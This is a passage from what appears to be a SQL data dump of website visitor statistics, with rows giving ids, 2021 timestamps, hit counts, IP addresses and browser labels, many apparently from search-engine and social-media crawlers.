.139.52.57','msie'),(554611,1619447981,1,1,0,0,'45.129.79.87','chrome'),(554612,1619448028,1,1,0,0,'45.132.129.13','other'),(554613,1619448314,1,1,0,0,'194.156.104.111','chrome'),(554614,1619448351,1,1,0,0,'45.139.52.57','other'),(554615,1619448390,1,1,0,0,'2.56.138.226','chrome'),(554616,1619448550,2,2,0,0,'46.150.244.45','chrome'),(554617,1619448749,1,1,0,0,'45.139.52.57','chrome'),(554618,1619449200,1,1,0,0,'45.129.79.87','other'),(554619,1619449235,1,1,0,0,'45.133.31.231','chrome'),(554620,1619449254,1,1,0,0,'194.156.105.135','chrome'),(554621,1619449789,1,1,0,0,'45.132.129.13','msie'),(554622,1619450003,1,1,0,0,'45.95.28.232','other'),(554623,1619450023,1,1,0,0,'45.95.28.232','msie'),(554624,1619450162,2,2,0,0,'45.133.31.231','msie'),(554625,1619450179,1,1,0,0,'45.131.47.227','msie'),(554626,1619450660,1,1,0,0,'194.156.105.135','other'),(554627,1619451035,1,1,0,0,'45.95.28.232','other'),(554628,1619451185,1,1,0,0,'45.131.47.227','other'),(554629,1619451376,1,1,0,0,'45.132.129.13','msie'),(554630,1619451395,1,1,0,0,'45.133.31.231','chrome'),(554631,1619451438,1,1,0,0,'194.156.104.111','other'),(554632,1619451688,1,1,0,0,'45.132.129.13','chrome'),(554634,1619451689,1,1,0,0,'45.133.31.231','firefox'),(554635,1619451698,1,1,0,0,'66.249.70.51','chrome'),(554636,1619451831,1,1,0,0,'2.56.138.226','other'),(554637,1619451865,1,1,0,0,'194.156.104.111','msie'),(554638,1619451900,1,1,0,0,'45.131.47.227','chrome'),(554639,1619451920,1,1,0,0,'45.139.52.57','firefox'),(554640,1619452138,1,1,0,0,'45.133.31.231','other'),(554641,1619452371,1,1,0,0,'45.132.129.13','msie'),(554642,1619452592,1,1,0,0,'46.150.244.45','msie'),(554643,1619452615,1,1,0,0,'194.156.105.135','msie'),(554644,1619452810,1,1,0,0,'194.156.104.111','chrome'),(554645,1619452822,2,2,0,0,'66.249.70.51','chrome'),(554646,1619452847,1,0,1,0,'66.249.70.49',''),(554647,1619452848,1,1,0,0,'194.156.104.111','msie'),(554648,1619452930,1,1,0,0,'45.131.47.227','msie'),(554649,1619453123,1,1,0,0,'45.133.31.231','firefox'),(554650,1619453203,1,1,0,0,'45.131.47.227','chrome'),(554651,1619453257,1,1,0,0,'2.56.138.226','chrome'),(554652,1619453327,3,3,0,0,'45.133.31.231','chrome'),(554653,1619453558,1,1,0,0,'45.95.28.232','other'),(554654,1619453870,1,1,0,0,'45.95.28.232','chrome'),(554655,1619454099,1,1,0,0,'194.156.104.111','msie'),(554656,1619454339,1,1,0,0,'45.131.47.227','chrome'),(554657,1619454379,1,1,0,0,'45.131.47.227','other'),(554658,1619455033,1,1,0,0,'194.156.104.111','other'),(554659,1619455400,1,1,0,0,'66.249.70.47','chrome'),(554660,1619455468,1,1,0,0,'45.95.28.232','other'),(554661,1619455518,1,1,0,0,'45.131.47.227','other'),(554662,1619455528,1,1,0,0,'2.56.138.226','msie'),(554663,1619455618,1,1,0,0,'91.229.101.60','chrome'),(554664,1619455875,1,1,0,0,'194.156.105.135','other'),(554665,1619455972,1,1,0,0,'2.56.138.226','chrome'),(554666,1619456103,1,1,0,0,'45.129.79.87','other'),(554667,1619456170,2,2,0,0,'45.132.129.13','other'),(554668,1619456241,1,1,0,0,'45.132.129.13','chrome'),(554669,1619456559,2,2,0,0,'45.133.31.231','other'),(554670,1619456708,1,1,0,0,'45.129.79.87','msie'),(554671,1619456718,1,1,0,0,'194.156.104.111','other'),(554672,1619456842,1,1,0,0,'194.156.105.135','other'),(554673,1619457491,1,1,0,0,'45.139.52.57','chrome'),(554674,1619457635,2,2,0,0,'45.129.79.87','other'),(554675,1619458235,2,2,0,0,'45.132.129.13','other'),(554676,1619458315,1,1,0,0,'45.139.52.57','other'),(554677,1619459317,2,2,0,0,'194.156.104.111','chrome'),(554678,1619459501,2,2,0,0,'2.56.138.226','msie'),(554679,1619459530,1,1,0,0,'45.95.28.232','other'),(554680,1619459609,2,2,0,0,'2.56.138.226','other'),(554681,1619459702,1,1,0,0,'45.131.47.227','other'),(554682,1619460334,2,2,0,0,'194.156.104.111','other'),(554683,1619460341,1,1,0,0,'173.252.111.21','other'),(554684,1619460342,1,1,0,0,'173.252.111.23','other'),(554685,1619460345,1,1,0,0,'69.171.251.2','other'),(554686,1619461017,1,1,0,0,'2.56.138.226','other'),(554687,1619461543,1,1,0,0,'45.129.79.87','other'),(554688,1619461729,1,1,0,0,'45.139.52.57','msie'),(554689,1619461916,1,1,0,0,'2.56.138.226','msie'),(554690,1619462218,1,1,0,0,'45.95.28.232','chrome'),(554691,1619462272,1,1,0,0,'45.95.28.232','other'),(554692,1619462347,1,1,0,0,'45.139.52.57','other'),(554693,1619462407,1,1,0,0,'45.129.79.87','chrome'),(554694,1619462422,1,1,0,0,'45.133.31.231','chrome'),(554695,1619462453,1,1,0,0,'45.132.129.13','chrome'),(554696,1619462748,1,1,0,0,'45.132.129.13','msie'),(554697,1619462970,1,1,0,0,'45.129.79.87','msie'),(554698,1619463086,1,1,0,0,'45.129.79.87','other'),(554699,1619463436,1,1,0,0,'194.156.105.135','other'),(554700,1619463526,2,2,0,0,'45.133.31.231','other'),(554701,1619463914,1,1,0,0,'45.139.52.57','other'),(554702,1619463994,1,1,0,0,'45.139.52.57','msie'),(554703,1619464034,1,1,0,0,'45.132.129.13','chrome'),(554704,1619464389,1,1,0,0,'45.139.52.57','chrome'),(554705,1619464474,1,1,0,0,'45.131.47.227','other'),(554706,1619465236,1,1,0,0,'45.131.47.227','msie'),(554707,1619465300,1,1,0,0,'194.156.104.111','msie'),(554708,1619465375,1,1,0,0,'45.129.79.87','other'),(554709,1619465385,1,1,0,0,'45.133.31.231','chrome'),(554710,1619465840,1,1,0,0,'45.133.31.231','msie'),(554711,1619466068,2,2,0,0,'2.56.138.226','chrome'),(554712,1619466230,1,1,0,0,'46.150.244.45','chrome'),(554713,1619466351,1,1,0,0,'194.156.104.111','other'),(554714,1619466440,1,1,0,0,'45.139.52.57','chrome'),(554715,1619466577,1,1,0,0,'45.133.31.231','other'),(554716,1619466918,1,1,0,0,'66.249.70.51','chrome'),(554717,1619466950,1,1,0,0,'2.56.138.226','other'),(554718,1619467237,1,1,0,0,'173.252.83.12','other'),(554719,1619467272,1,1,0,0,'45.139.52.57','msie'),(554720,1619468355,1,1,0,0,'34.77.162.22','other'),(554721,1619475668,1,1,0,0,'31.13.115.20','other'),(554722,1619476045,1,0,1,0,'66.249.70.47',''),(554723,1619478616,1,1,0,0,'66.249.70.47','chrome'),(554724,1619488067,2,1,1,0,'66.249.70.51',''),(554725,1619488080,2,2,0,0,'66.249.70.47','chrome'),(554726,1619488933,1,1,0,0,'66.249.70.49','chrome'),(554727,1619489085,2,2,0,0,'66.249.70.47','chrome'),(554728,1619489199,2,2,0,0,'66.249.70.51','chrome'),(554729,1619489866,1,1,0,0,'66.249.70.49','chrome'),(554730,1619490808,1,0,1,0,'66.249.70.47',''),(554731,1619490849,1,0,1,0,'66.249.70.51',''),(554732,1619490873,2,2,0,0,'66.249.70.49','chrome'),(554733,1619491058,1,1,0,0,'66.249.70.47','chrome'),(554734,1619499596,1,1,0,0,'66.249.70.47','chrome'),(554735,1619504266,1,1,0,0,'66.249.70.49','chrome'),(554736,1619512080,1,0,1,0,'66.249.70.47',''),(554737,1619521830,1,1,0,0,'66.249.75.79','chrome'),(554738,1619526076,1,1,0,0,'66.249.70.51','chrome'),(554739,1619532064,1,1,0,0,'66.249.70.49','chrome'),(554740,1619533703,2,1,1,0,'66.249.70.47',''),(554741,1619534480,1,1,0,0,'66.249.70.49','chrome'),(554742,1619536978,1,1,0,0,'173.252.83.5','other'),(554743,1619537398,2,2,0,0,'66.249.70.47','chrome'),(554744,1619537581,1,1,0,0,'66.249.70.51','chrome'),(554745,1619538175,1,1,0,0,'66.249.70.49','chrome'),(554746,1619539106,1,0,1,0,'66.249.70.49',''),(554747,1619539421,1,1,0,0,'66.249.70.51','chrome'),(554748,1619539494,1,1,0,0,'66.249.70.49','chrome'),(554749,1619558283,1,1,0,0,'66.249.70.51','chrome'),(554750,1619558288,1,0,1,0,'66.249.70.47',''),(554751,1619566567,1,0,1,0,'66.249.70.47',''),(554752,1619568781,1,1,0,0,'34.96.130.7','other'),(554753,1619589611,1,1,0,0,'66.249.70.51','chrome'),(554754,1619590019,1,1,0,0,'66.249.70.49','chrome'),(554755,1619592021,2,1,1,0,'66.249.70.51',''),(554756,1619596838,1,0,1,0,'66.249.70.47',''),(554757,1619597324,1,1,0,0,'66.249.70.51','chrome'),(554758,1619599187,1,1,0,0,'66.249.70.51','chrome'),(554759,1619600619,2,2,0,0,'66.249.70.47','chrome'),(554760,1619601705,1,1,0,0,'66.249.70.49','chrome'),(554761,1619602471,1,1,0,0,'66.249.70.47','chrome'),(554762,1619602920,1,0,1,0,'66.249.70.51',''),(554763,1619605206,1,1,0,0,'66.249.70.49','chrome'),(554764,1619605404,1,1,0,0,'66.249.70.51','chrome'),(554765,1619607011,1,1,0,0,'66.249.70.51','chrome'),(554766,1619609072,1,0,1,0,'66.249.70.49',''),(554767,1619619163,1,1,0,0,'66.249.70.49','chrome'),(554768,1619620656,1,0,1,0,'66.249.70.51',''),(554769,1619627087,1,1,0,0,'193.186.4.126','chrome'),(554770,1619627186,1,0,1,0,'66.249.70.47',''),(554771,1619631402,1,1,0,0,'66.249.70.49','chrome'),(554772,1619635132,1,0,1,0,'66.249.70.49',''),(554773,1619637645,1,1,0,0,'66.249.70.47','chrome'),(554774,1619645541,2,1,1,0,'66.249.70.51',''),(554775,1619647851,1,1,0,0,'52.142.162.28','chrome'),(554776,1619648740,1,1,0,0,'66.249.70.47','chrome'),(554777,1619653640,1,1,0,0,'64.227.53.63','firefox'),(554778,1619656728,1,1,0,0,'74.125.151.47','other'),(554779,1619669720,1,1,0,0,'66.249.70.49','chrome'),(554780,1619671631,1,1,0,0,'162.55.56.128','other'),(554781,1619677404,1,0,1,0,'66.249.70.47',''),(554782,1619686550,1,1,0,0,'173.252.111.9','other'),(554783,1619686551,1,1,0,0,'173.252.111.16','other'),(554784,1619693110,1,1,0,0,'199.244.88.132','chrome'),(554785,1619693271,1,1,0,0,'66.249.70.47','chrome'),(554786,1619714020,1,0,1,0,'66.249.70.49',''),(554787,1619716615,1,1,0,0,'185.12.143.103','chrome'),(554788,1619720405,1,1,0,0,'173.252.111.117','other'),(554789,1619720406,1,1,0,0,'31.13.115.11','other'),(554791,1619720407,1,1,0,0,'69.171.251.15','other'),(554792,1619720422,1,1,0,0,'173.252.111.16','other'),(554793,1619720599,1,1,0,0,'173.252.111.10','other'),(554794,1619720706,1,1,0,0,'66.220.149.23','other'),(554795,1619720721,1,1,0,0,'173.252.111.9','other'),(554796,1619720722,1,1,0,0,'173.252.111.1','other'),(554797,1619723300,1,1,0,0,'66.249.70.49','chrome'),(554798,1619724142,1,1,0,0,'207.244.234.52','firefox'),(554799,1619733648,2,2,0,0,'66.249.70.49','chrome'),(554800,1619741854,1,1,0,0,'66.249.70.49','chrome'),(554801,1619743540,1,1,0,0,'66.249.70.51','chrome'),(554802,1619747617,1,1,0,0,'109.70.106.130','other'),(554803,1619755609,1,0,1,0,'66.249.70.47',''),(554804,1619756133,1,1,0,0,'66.249.70.49','chrome'),(554805,1619757227,1,1,0,0,'31.13.103.17','other'),(554806,1619757228,1,1,0,0,'31.13.103.13','other'),(554807,1619757911,1,1,0,0,'66.249.70.51','chrome'),(554808,1619762584,1,1,0,0,'66.249.70.51','chrome'),(554809,1619769360,1,1,0,0,'66.249.70.49','chrome'),(554810,1619777122,1,1,0,0,'66.249.70.49','chrome'),(554811,1619778557,1,1,0,0,'66.249.70.47','chrome'),(554812,1619778861,1,1,0,0,'31.13.103.18','other'),(554813,1619779172,2,2,0,0,'66.249.70.51','chrome'),(554814,1619780113,1,0,1,0,'66.249.70.51',''),(554815,1619780586,2,2,0,0,'66.249.70.47','chrome'),(554816,1619781710,2,1,1,0,'66.249.70.51',''),(554817,1619781854,1,1,0,0,'176.36.232.170','other'),(554818,1619798750,1,0,1,0,'66.249.70.47',''),(554819,1619810362,1,1,0,0,'100.21.218.158','firefox'),(554820,1619823490,1,0,1,0,'66.249.70.51',''),(554821,1619828074,1,1,0,0,'34.86.35.33','other'),(554822,1619829476,1,1,0,0,'66.249.70.47','chrome'),(554823,1619832253,1,0,1,0,'66.249.70.47',''),(554824,1619832282,2,2,0,0,'66.249.70.49','chrome'),(554825,1619833228,1,1,0,0,'66.249.70.49','chrome'),(554826,1619834955,1,0,1,0,'66.249.70.47',''),(554827,1619838328,1,1,0,0,'66.249.70.51','chrome'),(554828,1619839393,1,0,1,0,'66.249.70.47',''),(554829,1619840345,1,0,1,0,'66.249.70.49',''),(554830,1619841034,2,2,0,0,'66.249.70.47','chrome'),(554831,1619841673,1,1,0,0,'66.249.70.49','chrome'),(554832,1619843904,1,1,0,0,'66.249.70.49','chrome'),(554833,1619844564,3,3,0,0,'66.249.70.51','chrome'),(554834,1619845026,1,1,0,0,'92.118.160.9','other'),(554835,1619849916,1,0,1,0,'66.249.70.47',''),(554836,1619854388,1,1,0,0,'34.96.130.27','other'),(554837,1619861746,1,0,1,0,'66.249.70.47',''),(554838,1619872099,1,0,1,0,'66.249.70.51',''),(554839,1619874303,1,0,1,0,'66.249.70.49',''),(554840,1619880391,2,2,0,0,'66.249.70.51','chrome'),(554841,1619880613,1,1,0,0,'66.249.70.47','chrome'),(554842,1619881601,1,1,0,0,'66.249.70.51','chrome'),(554843,1619884728,1,1,0,0,'192.151.156.190','chrome'),(554844,1619886343,1,0,1,0,'66.249.70.47',''),(554845,1619889829,1,1,0,0,'66.249.70.51','chrome'),(554846,1619896701,1,1,0,0,'66.249.70.49','chrome'),(554847,1619917229,1,0,1,0,'66.249.70.47',''),(554848,1619937291,1,1,0,0,'66.249.70.47','chrome'),(554849,1619941732,1,1,0,0,'5.255.253.92','other'),(554850,1619953146,1,1,0,0,'66.249.70.51','chrome'),(554851,1619962870,1,0,1,0,'66.249.70.47',''),(554852,1619963628,1,0,1,0,'66.249.70.51',''),(554853,1619980047,1,1,0,0,'5.255.253.92','other'),(554854,1619980229,1,1,0,0,'77.221.144.174','firefox'),(554855,1620007202,1,1,0,0,'5.255.253.92','other'),(554856,1620008257,1,0,1,0,'66.249.70.51',''),(554857,1620011217,1,1,0,0,'5.255.253.92','other'),(554858,1620014501,1,1,0,0,'5.255.253.92','other'),(554859,1620016150,1,1,0,0,'5.255.253.92','other'),(554860,1620021980,1,0,1,0,'66.249.70.47',''),(554861,1620023973,1,1,0,0,'5.255.253.92','other'),(554862,1620029236,1,1,0,0,'5.255.253.158','other'),(554863,1620029373,1,1,0,0,'66.249.70.49','chrome'),(554864,1620032513,1,0,1,0,'66.249.70.49',''),(554865,1620038317,1,1,0,0,'5.45.207.150','other'),(554866,1620052961,1,0,1,0,'66.249.70.49',''),(554867,1620053160,1,0,1,0,'66.249.70.51',''),(554868,1620069066,1,1,0,0,'31.13.127.10','other'),(554869,1620089781,1,1,0,0,'5.255.253.92','other'),(554870,1620096767,1,0,1,0,'66.249.70.47',''),(554871,1620096842,1,1,0,0,'5.255.253.92','other'),(554872,1620097507,1,1,0,0,'34.96.130.30','other'),(554873,1620097768,1,1,0,0,'5.255.253.92','other'),(554874,1620098053,1,0,1,0,'66.249.70.47',''),(554875,1620112581,1,1,0,0,'5.255.231.179','other'),(554876,1620112583,1,1,0,0,'213.180.203.253','other'),(554877,1620113664,1,1,0,0,'5.255.253.77','other'),(554878,1620115267,1,1,0,0,'5.255.253.136','other'),(554879,1620120946,1,1,0,0,'5.255.253.77','other'),(554880,1620122270,5,5,0,0,'35.183.60.188','chrome'),(554881,1620133863,1,1,0,0,'5.255.253.158','other'),(554882,1620134696,1,1,0,0,'141.8.142.94','other'),(554883,1620136930,1,1,0,0,'5.45.207.79','other'),(554884,1620138548,1,1,0,0,'91.196.178.85','chrome'),(554885,1620143167,1,0,1,0,'66.249.70.49',''),(554886,1620143453,1,0,1,0,'66.249.70.51',''),(554887,1620146231,1,0,1,0,'66.249.70.49',''),(554888,1620146826,1,0,1,0,'5.188.211.72',''),(554889,1620147538,1,1,0,0,'5.255.231.111','other'),(554890,1620150017,1,1,0,0,'34.254.44.235','other'),(554891,1620150063,5,5,0,0,'52.60.189.115','chrome'),(554892,1620153782,1,1,0,0,'5.45.207.132','other'),(554893,1620162645,1,1,0,0,'5.255.253.92','other'),(554894,1620164747,1,1,0,0,'5.255.231.19','other'),(554895,1620164789,17,17,0,0,'5.255.253.92','other'),(554896,1620164803,1,1,0,0,'5.255.231.179','other'),(554897,1620164805,1,1,0,0,'5.255.253.138','other'),(554898,1620164808,2,2,0,0,'213.180.203.96','other'),(554899,1620164810,1,1,0,0,'5.255.253.136','other'),(554900,1620164819,4,4,0,0,'5.255.253.87','other'),(554901,1620164848,1,1,0,0,'5.45.207.150','other'),(554902,1620164872,1,1,0,0,'213.180.203.111','other'),(554903,1620170310,4,4,0,0,'109.70.111.112','chrome'),(554904,1620172693,1,1,0,0,'5.255.253.92','other'),(554905,1620181462,1,0,1,0,'66.249.70.47',''),(554906,1620186336,1,1,0,0,'86.61.131.92','other'),(554907,1620189269,1,1,0,0,'167.99.51.164','other'),(554908,1620192181,1,1,0,0,'167.99.112.216','other'),(554909,1620192580,1,0,1,0,'66.249.70.49',''),(554910,1620197927,1,1,0,0,'91.196.178.169','chrome'),(554911,1620202367,1,1,0,0,'34.86.35.28','other'),(554912,1620208437,1,1,0,0,'31.13.103.21','other'),(554913,1620208880,1,1,0,0,'69.171.251.19','other'),(554914,1620208884,3,3,0,0,'173.252.111.11','other'),(554915,1620208932,1,1,0,0,'173.252.111.6','other'),(554916,1620208933,2,2,0,0,'173.252.111.119','other'),(554917,1620208947,1,1,0,0,'173.252.111.1','other'),(554918,1620208961,1,1,0,0,'173.252.111.21','other'),(554919,1620208962,3,3,0,0,'173.252.111.4','other'),(554921,1620208963,1,1,0,0,'173.252.111.17','other'),(554923,1620209004,1,1,0,0,'173.252.111.3','other'),(554924,1620209008,1,1,0,0,'173.252.111.24','other'),(554925,1620214164,1,1,0,0,'5.255.253.87','other'),(554926,1620220879,1,1,0,0,'31.13.127.26','other'),(554927,1620221957,1,1,0,0,'66.249.70.49','chrome'),(554928,1620223200,1,1,0,0,'173.252.95.16','other'),(554929,1620227955,1,1,0,0,'5.255.253.92','other'),(554930,1620232034,1,1,0,0,'93.72.230.115','chrome'),(554931,1620239621,2,2,0,0,'94.153.35.36','chrome'),(554932,1620242655,1,0,1,0,'66.249.70.47',''),(554933,1620245183,1,1,0,0,'31.13.127.34','other'),(554934,1620253481,3,3,0,0,'45.79.53.191','firefox'),(554935,1620258673,1,1,0,0,'66.249.70.47','chrome'),(554936,1620278310,1,1,0,0,'5.255.253.92','other'),(554937,1620287901,1,0,1,0,'66.249.70.51',''),(554938,1620291139,1,1,0,0,'89.184.66.143','firefox'),(554939,1620304405,1,1,0,0,'66.249.70.49','chrome'),(554940,1620307377,1,0,1,0,'66.249.70.51',''),(554941,1620307676,1,1,0,0,'5.255.231.77','other'),(554942,1620309226,1,1,0,0,'31.13.127.8','other'),(554943,1620309531,3,3,0,0,'35.240.234.239','firefox'),(554944,1620312198,1,1,0,0,'94.153.85.247','chrome'),(554945,1620312822,2,2,0,0,'3.6.118.142','firefox'),(554946,1620316518,1,1,0,0,'5.255.253.92','other'),(554947,1620317252,1,1,0,0,'185.220.102.241','firefox'),(554948,1620319483,2,2,0,0,'5.255.253.92','other'),(554949,1620325033,2,2,0,0,'188.163.9.20','chrome'),(554950,1620332314,1,0,1,0,'66.249.70.39',''),(554951,1620334831,1,0,1,0,'66.249.70.63',''),(554952,1620335372,1,1,0,0,'34.96.130.16','other'),(554953,1620335751,1,1,0,0,'5.255.231.53','other'),(554954,1620350926,1,1,0,0,'66.249.70.34','chrome'),(554955,1620359715,1,1,0,0,'34.96.130.5','other'),(554956,1620367316,1,1,0,0,'66.249.70.47','chrome'),(554957,1620375396,1,1,0,0,'46.98.51.145','chrome'),(554958,1620378508,1,0,1,0,'66.249.70.51',''),(554959,1620386740,1,1,0,0,'173.252.111.7','other'),(554960,1620386741,1,1,0,0,'173.252.111.19','other'),(554961,1620402169,1,1,0,0,'89.184.66.143','firefox'),(554962,1620412925,5,5,0,0,'52.42.79.222','chrome'),(554963,1620426463,1,0,1,0,'66.249.70.47',''),(554964,1620427500,3,3,0,0,'5.255.253.87','other'),(554965,1620427560,1,1,0,0,'5.255.253.117','other'),(554966,1620427563,1,1,0,0,'5.255.231.53','other'),(554967,1620427565,5,5,0,0,'5.255.253.92','other'),(554968,1620427571,2,2,0,0,'5.45.207.150','other'),(554969,1620427573,2,2,0,0,'213.180.203.111','other'),(554970,1620427576,1,1,0,0,'5.255.231.133','other'),(554971,1620427578,1,1,0,0,'5.255.231.143','other'),(554972,1620427581,1,1,0,0,'213.180.203.96','other'),(554973,1620427583,1,1,0,0,'5.255.231.129','other'),(554974,1620427585,1,1,0,0,'5.45.207.186','other'),(554975,1620427588,1,1,0,0,'213.180.203.105','other'),(554976,1620445525,1,1,0,0,'69.30.225.99','chrome'),(554977,1620449620,1,1,0,0,'66.249.70.49','chrome'),(554978,1620449741,1,1,0,0,'92.118.160.1','other'),(554979,1620452877,1,1,0,0,'185.237.217.11','chrome'),(554980,1620452903,1,1,0,0,'31.13.115.10','other'),(554982,1620452905,1,1,0,0,'31.13.115.2','other'),(554983,1620452906,1,1,0,0,'31.13.115.15','other'),(554984,1620452907,1,1,0,0,'31.13.115.119','other'),(554985,1620452908,1,1,0,0,'31.13.115.18','other'),(554986,1620457534,1,1,0,0,'146.120.97.25','chrome'),(554987,1620466919,1,0,1,0,'66.249.70.47',''),(554988,1620467063,1,1,0,0,'66.249.70.47','chrome'),(554989,1620469610,1,1,0,0,'213.180.203.28','other'),(554990,1620469613,1,1,0,0,'5.45.207.78','other'),(554991,1620469616,1,1,0,0,'141.8.142.93','other'),(554992,1620469659,1,1,0,0,'5.255.231.151','other'),(554993,1620469662,1,1,0,0,'213.180.203.39','other'),(554994,1620472204,2,2,0,0,'66.249.70.47','chrome'),(554995,1620476103,1,1,0,0,'124.207.115.68','chrome'),(554996,1620477700,1,1,0,0,'66.249.70.51','chrome'),(554997,1620477747,1,0,1,0,'66.249.70.49',''),(554998,1620489368,1,1,0,0,'5.255.253.87','other'),(554999,1620490688,1,1,0,0,'173.252.111.4','other'),(555000,1620496076,1,1,0,0,'66.249.70.47','chrome'),(555001,1620496101,1,1,0,0,'77.222.108.246','other'),(555002,1620497028,1,1,0,0,'173.252.107.3','other'),(555003,1620497029,1,1,0,0,'173.252.107.22','other'),(555004,1620500041,1,0,1,0,'66.249.70.49',''),(555005,1620500089,1,0,1,0,'66.249.70.47',''),(555006,1620504226,1,1,0,0,'77.222.108.246','other'),(555007,1620515260,2,2,0,0,'193.124.206.11','other'),(555008,1620518217,2,2,0,0,'193.124.206.11','other'),(555009,1620521487,1,1,0,0,'193.124.206.11','other'),(555010,1620523108,2,2,0,0,'193.124.206.11','other'),(555011,1620525103,1,1,0,0,'193.124.206.11','other'),(555012,1620525830,1,0,1,0,'66.249.70.49',''),(555013,1620526474,1,1,0,0,'66.249.70.51','chrome'),(555014,1620529128,1,1,0,0,'193.124.206.11','other'),(555015,1620531501,1,1,0,0,'66.249.70.49','chrome'),(555016,1620534464,1,1,0,0,'66.115.173.18','firefox'),(555017,1620535232,1,1,0,0,'31.13.103.12','other'),(555018,1620535233,1,1,0,0,'31.13.103.6','other'),(555019,1620543562,1,1,0,0,'66.249.70.49','chrome'),(555020,1620547490,1,1,0,0,'66.249.70.49','chrome'),(555021,1620552481,1,1,0,0,'185.237.217.7','firefox'),(555022,1620553058,4,4,0,0,'173.252.111.24','other'),(555023,1620553061,1,1,0,0,'173.252.111.5','other'),(555024,1620553091,1,1,0,0,'173.252.95.31','other'),(555027,1620553092,1,1,0,0,'173.252.127.116','other'),(555029,1620562677,2,2,0,0,'149.202.123.250','chrome'),(555030,1620565085,1,1,0,0,'66.249.70.47','chrome'),(555031,1620565313,2,2,0,0,'45.149.83.195','chrome'),(555032,1620568363,1,1,0,0,'66.249.70.49','chrome'),(555033,1620568719,1,1,0,0,'66.249.70.47','chrome'),(555034,1620569672,2,1,1,0,'66.249.70.47',''),(555035,1620574459,1,1,0,0,'66.249.70.47','chrome'),(555036,1620575011,1,1,0,0,'66.249.70.49','chrome'),(555037,1620576306,2,2,0,0,'66.249.70.47','chrome'),(555038,1620580033,1,0,1,0,'66.249.70.49',''),(555039,1620583958,1,1,0,0,'66.249.70.51','chrome'),(555040,1620586675,2,1,1,0,'66.249.70.15',''),(555041,1620589803,1,1,0,0,'106.75.147.172','firefox'),(555042,1620593723,1,1,0,0,'5.255.253.92','other'),(555043,1620595100,1,0,1,0,'66.249.70.51',''),(555044,1620595182,1,1,0,0,'66.249.70.47','chrome'),(555045,1620615099,1,1,0,0,'173.252.111.13','other'),(555046,1620619229,1,0,1,0,'66.249.70.47',''),(555047,1620636079,1,1,0,0,'64.246.165.180','firefox'),(555048,1620641437,1,1,0,0,'5.45.207.92','other'),(555049,1620641572,1,1,0,0,'185.237.217.11','chrome'),(555050,1620641941,4,4,0,0,'54.70.229.13','firefox'),(555051,1620650511,4,4,0,0,'18.231.94.162','chrome'),(555052,1620655535,2,2,0,0,'31.13.103.12','other'),(555053,1620655545,1,1,0,0,'31.13.127.14','other'),(555054,1620656117,1,0,1,0,'66.249.70.51',''),(555055,1620656525,1,1,0,0,'66.249.70.49','chrome'),(555056,1620671315,1,0,1,0,'66.249.70.47',''),(555057,1620720641,1,0,1,0,'66.249.70.47',''),(555058,1620722444,1,1,0,0,'34.77.162.30','other'),(555059,1620735038,1,1,0,0,'66.249.70.51','chrome'),(555060,1620735432,1,1,0,0,'69.171.249.117','other'),(555061,1620735435,1,1,0,0,'66.220.149.3','other'),(555062,1620735504,1,1,0,0,'173.252.127.28','other'),(555063,1620735507,1,1,0,0,'69.171.249.13','other'),(555064,1620736729,1,1,0,0,'85.223.157.11','chrome'),(555065,1620744754,1,1,0,0,'5.255.253.92','other'),(555066,1620754166,1,1,0,0,'66.249.70.51','chrome'),(555067,1620757079,1,1,0,0,'173.252.111.118','other'),(555068,1620757080,1,1,0,0,'173.252.111.1','other'),(555069,1620758518,1,1,0,0,'173.252.111.23','other'),(555070,1620761839,1,1,0,0,'194.44.36.149','chrome'),(555071,1620762617,1,1,0,0,'66.249.70.51','chrome'),(555072,1620766383,1,1,0,0,'66.249.70.47','chrome'),(555073,1620771783,1,1,0,0,'213.180.203.73','other'),(555074,1620772382,1,0,1,0,'66.249.70.51',''),(555075,1620792312,2,2,0,0,'45.149.130.246','other'),(555076,1620793356,1,1,0,0,'66.249.70.51','chrome'),(555077,1620799172,1,1,0,0,'66.249.70.51','chrome'),(555078,1620803755,13,13,0,0,'5.255.253.92','other'),(555079,1620803817,8,8,0,0,'5.255.253.87','other'),(555080,1620811566,3,3,0,0,'173.252.111.12','other'),(555081,1620811567,1,1,0,0,'173.252.111.117','other'),(555082,1620811568,2,2,0,0,'173.252.111.119','other'),(555083,1620811569,2,2,0,0,'173.252.111.18','other'),(555084,1620811573,3,3,0,0,'173.252.111.116','other'),(555085,1620811574,2,2,0,0,'173.252.111.17','other'),(555089,1620811575,1,1,0,0,'173.252.111.20','other'),(555092,1620814395,2,2,0,0,'66.249.70.47','chrome'),(555093,1620814807,2,0,2,0,'66.249.70.49',''),(555094,1620815465,1,0,1,0,'66.249.70.47',''),(555095,1620831910,1,1,0,0,'5.255.253.92','other'),(555096,1620837233,1,1,0,0,'69.171.251.23','other'),(555097,1620841428,1,1,0,0,'66.249.70.49','chrome'),(555098,1620841453,2,2,0,0,'66.249.70.51','chrome'),(555099,1620843988,1,1,0,0,'66.249.70.51','chrome'),(555100,1620844228,3,3,0,0,'124.217.235.217','firefox'),(555101,1620844357,1,1,0,0,'5.255.253.92','other'),(555102,1620844391,1,0,1,0,'66.249.70.47',''),(555103,1620851862,1,1,0,0,'66.249.70.47','chrome'),(555104,1620851933,1,0,1,0,'66.249.70.51',''),(555105,1620856122,3,3,0,0,'195.161.114.231','firefox'),(555106,1620857778,1,0,1,0,'66.249.70.47',''),(555107,1620860553,1,1,0,0,'5.255.253.92','other'),(555108,1620863361,1,0,1,0,'66.249.70.47',''),(555109,1620892008,1,1,0,0,'5.255.253.136','other'),(555110,1620899052,1,1,0,0,'66.249.70.51','chrome'),(555111,1620899070,2,0,2,0,'66.249.70.47',''),(555112,1620904657,1,1,0,0,'66.249.70.51','chrome'),(555113,1620916934,2,2,0,0,'45.82.81.226','chrome'),(555114,1620920057,1,1,0,0,'66.249.70.47','chrome'),(555115,1620924884,1,0,1,0,'66.249.70.49',''),(555116,1620926088,1,1,0,0,'66.249.70.47','chrome'),(555117,1620927647,1,0,1,0,'66.249.70.49',''),(555118,1620928493,1,1,0,0,'66.249.70.47','chrome'),(555119,1620932665,9,9,0,0,'172.105.94.178','other'),(555120,1620932666,9,9,0,0,'192.46.237.237','other'),(555121,1620935199,3,3,0,0,'104.236.120.31','firefox'),(555122,1620940167,2,1,1,0,'66.249.70.47',''),(555123,1620940263,1,0,1,0,'66.249.70.51',''),(555124,1620944712,1,1,0,0,'5.45.207.150','other'),(555125,1620944716,1,1,0,0,'5.255.253.81','other'),(555126,1620944719,1,1,0,0,'5.255.253.92','other'),(555127,1620946966,1,0,1,0,'66.249.70.15',''),(555128,1620946968,1,0,1,0,'66.249.70.17',''),(555129,1620949220,1,1,0,0,'66.249.70.17','chrome'),(